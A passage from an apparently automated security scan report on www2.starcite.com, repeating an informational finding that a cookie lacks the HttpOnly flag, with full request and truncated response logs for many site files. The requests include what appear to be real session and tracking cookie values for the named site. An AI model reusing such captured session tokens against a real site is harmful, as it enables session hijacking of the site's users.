Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:42 GMT;path=/

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e)
...[SNIP]...

2.58. http://www2.starcite.com/starcite/modules/jstools/tabs/tabs.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/jstools/tabs/tabs.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/jstools/tabs/tabs.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:06 GMT
Server: Apache
Last-Modified: Mon, 01 Jan 2007 09:08:00 GMT
ETag: "10000000027d6-77a-425f6f33ebc00"
Accept-Ranges: bytes
Content-Length: 1914
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:32 GMT;path=/

/*
IMPORTANT:
Essential styles to ensure accessibility
*/
@media projection, screen { /* use class for showing/hiding tab content, so that visibility can be better controlled in different media types.
...[SNIP]...

2.59. http://www2.starcite.com/starcite/modules/jstools/tabs/tabs.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/jstools/tabs/tabs.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/jstools/tabs/tabs.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:16 GMT
Server: Apache
Last-Modified: Sun, 30 Mar 2008 02:07:00 GMT
ETag: "10000000027d9-10da-4499dfd95f900"
Accept-Ranges: bytes
Content-Length: 4314
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:42 GMT;path=/

// $Id: tabs.js,v 1.2.2.9 2008/03/29 13:37:28 nedjo Exp $

Drupal.behaviors.tabs = function (context) {

// Process custom tabs.
$('.drupal-tabs:not(.tabs-processed)', context)
.addClass('tabs
...[SNIP]...

2.60. http://www2.starcite.com/starcite/modules/meetings2/meetings.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/meetings2/meetings.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/meetings2/meetings.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
Last-Modified: Fri, 19 Sep 2008 19:40:00 GMT
ETag: "100000000290b-387-45744ddf42400"
Accept-Ranges: bytes
Content-Length: 903
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:39 GMT;path=/

function meetings2_form_validation(){
   var title    = document.getElementById('title').value;
   var description    = document.getElementById('description').value;
   var imageurl    = document.getElementById('
...[SNIP]...

2.61. http://www2.starcite.com/starcite/modules/meetings3/meetings.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/meetings3/meetings.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/meetings3/meetings.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
Last-Modified: Fri, 19 Sep 2008 19:40:00 GMT
ETag: "1000000002910-387-45744ddf42400"
Accept-Ranges: bytes
Content-Length: 903
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:39 GMT;path=/

function meetings3_form_validation(){
   var title    = document.getElementById('title').value;
   var description    = document.getElementById('description').value;
   var imageurl    = document.getElementById('
...[SNIP]...

2.62. http://www2.starcite.com/starcite/modules/meetings4/meetings.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/meetings4/meetings.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/meetings4/meetings.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
Last-Modified: Fri, 19 Sep 2008 19:40:00 GMT
ETag: "1000000002915-384-45744ddf42400"
Accept-Ranges: bytes
Content-Length: 900
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:39 GMT;path=/

function meetings4_form_validation(){
   var title    = document.getElementById('title').value;
   var description    = document.getElementById('description').value;
   var imageurl    = document.getElementById('
...[SNIP]...

2.63. http://www2.starcite.com/starcite/modules/meetingsmeetings.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/meetingsmeetings.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/meetingsmeetings.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 404 Not Found
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 13:57:13 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:40 GMT;path=/
Content-Length: 11878

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.64. http://www2.starcite.com/starcite/modules/node/node.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/node/node.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/node/node.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:09 GMT
Server: Apache
Last-Modified: Wed, 25 Jul 2007 07:08:00 GMT
ETag: "1000000002927-2a6-436112b8f5400"
Accept-Ranges: bytes
Content-Length: 678
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:34 GMT;path=/

/* $Id: node.css,v 1.2.2.1 2007/07/24 18:38:58 drumm Exp $ */

.node-unpublished {
background-color: #fff4f4;
}
.preview .node {
background-color: #ffffea;
}
#node-admin-filter ul {
list-style-t
...[SNIP]...

2.65. http://www2.starcite.com/starcite/modules/planners_howitworks/howitworks.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/planners_howitworks/howitworks.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/planners_howitworks/howitworks.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:13 GMT
Server: Apache
Last-Modified: Thu, 28 Aug 2008 17:38:00 GMT
ETag: "1000000002941-2cb-4558899238e00"
Accept-Ranges: bytes
Content-Length: 715
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:39 GMT;path=/

function planners_howitworks_form_validation(){
   var leftside_title    = document.getElementById('leftside_title').value;
   var middle_title    = document.getElementById('middle_title').value;
   var rights
...[SNIP]...

2.66. http://www2.starcite.com/starcite/modules/supplier_products/supplier_products.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/supplier_products/supplier_products.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/supplier_products/supplier_products.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:14 GMT
Server: Apache
Last-Modified: Fri, 29 Aug 2008 00:09:00 GMT
ETag: "1000000002966-2be-4558e0f76bf00"
Accept-Ranges: bytes
Content-Length: 702
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:40 GMT;path=/

function supplier_products_form_validation(){
   var title    = document.getElementById('title').value;
   var description    = document.getElementById('description').value;
   var imageurl    = document.getEleme
...[SNIP]...

2.67. http://www2.starcite.com/starcite/modules/system/defaults.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/system/defaults.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/system/defaults.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:09 GMT
Server: Apache
Last-Modified: Tue, 26 Aug 2008 04:23:00 GMT
ETag: "1000000002971-339-4555542509100"
Accept-Ranges: bytes
Content-Length: 825
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:35 GMT;path=/

/* $Id: defaults.css,v 1.2 2006/08/25 09:01:12 drumm Exp $ */

/*
** HTML elements
*/
fieldset {
margin-bottom: 1em;
padding: .5em;
}
form {
margin: 0;
padding: 0;
}
hr {
heigh
...[SNIP]...

2.68. http://www2.starcite.com/starcite/modules/system/system.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/system/system.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/system/system.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:09 GMT
Server: Apache
Last-Modified: Fri, 14 Nov 2008 05:48:34 GMT
ETag: "1000000002972-1afb-45b9fc7a13080"
Accept-Ranges: bytes
Content-Length: 6907
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:34 GMT;path=/

/* $Id: system.css,v 1.21 2006/12/21 16:13:06 dries Exp $ */

/*
** HTML elements
*/
th.active img {
display: inline;
}
tr.even, tr.odd {
background-color: #eee;
border-bottom: 1px solid #ccc;

...[SNIP]...

2.69. http://www2.starcite.com/starcite/modules/technology_overview/technology_overview.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/technology_overview/technology_overview.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/technology_overview/technology_overview.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:16 GMT
Server: Apache
Last-Modified: Fri, 03 Oct 2008 20:01:00 GMT
ETag: "100000000297f-f2-4585ecad57700"
Accept-Ranges: bytes
Content-Length: 242
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:42 GMT;path=/

function trim(str)
{
   return str.replace(/^\s*|\s*$/g,"");
}
function technology_overview_form_validation(){
   var title    = document.getElementById('title').value;
   if (trim(title)=="")
   {
       ale
...[SNIP]...

2.70. http://www2.starcite.com/starcite/modules/user/user.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/modules/user/user.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/modules/user/user.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:09 GMT
Server: Apache
Last-Modified: Sat, 30 Dec 2006 20:15:00 GMT
ETag: "1000000002b1b-35a-425d808f0b900"
Accept-Ranges: bytes
Content-Length: 858
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:35 GMT;path=/

/* $Id: user.css,v 1.4 2006/12/30 07:45:31 dries Exp $ */

#permissions td.module {
font-weight: bold;
}
#permissions td.permission {
padding-left: 1.5em;
}
#access-rules .access-type, #access-rul
...[SNIP]...

2.71. http://www2.starcite.com/starcite/morronijq.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/morronijq.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/morronijq.js HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:17 GMT
Server: Apache
Last-Modified: Tue, 09 Feb 2010 20:15:25 GMT
ETag: "5000000002dde-114bc-47f3093ff9140"
Accept-Ranges: bytes
Content-Length: 70844
Content-Type: application/javascript
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:43 GMT;path=/

/*!
* jQuery JavaScript Library v1.4.1
* http://jquery.com/
*
* Copyright 2010, John Resig
* Dual licensed under the MIT or GPL Version 2 licenses.
* http://jquery.org/license
*
* Includes Siz
...[SNIP]...

2.72. http://www2.starcite.com/starcite/news

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/news

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/news HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:13:40 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:13:40 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=28
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:36:14 GMT;path=/
Content-Length: 23053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.73. http://www2.starcite.com/starcite/newsandevents

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/newsandevents HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:10:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:10:33 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:33:03 GMT;path=/
Content-Length: 41113

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="Description"
...[SNIP]...

2.74. http://www2.starcite.com/starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/newsandevents/events/connecting-dots-whats-connection-between-technology-and-smmp HTTP/1.1
Host: www2.starcite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: has_js=1; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SITESERVER=GUID=f76247131a65e483501712736841048f; __utma=174720036.244046565.1293976610.1293976610.1293976610.1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660;

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 14:25:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.6
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sun, 02 Jan 2011 14:25:22 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:47:58 GMT;path=/
Content-Length: 18313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
<meta name="Descrip
...[SNIP]...

2.75. http://www2.starcite.com/starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/newsandevents/events/new-whitepaper-release-how-sunshine-provisions-impact-meetings-management HTTP/1.1
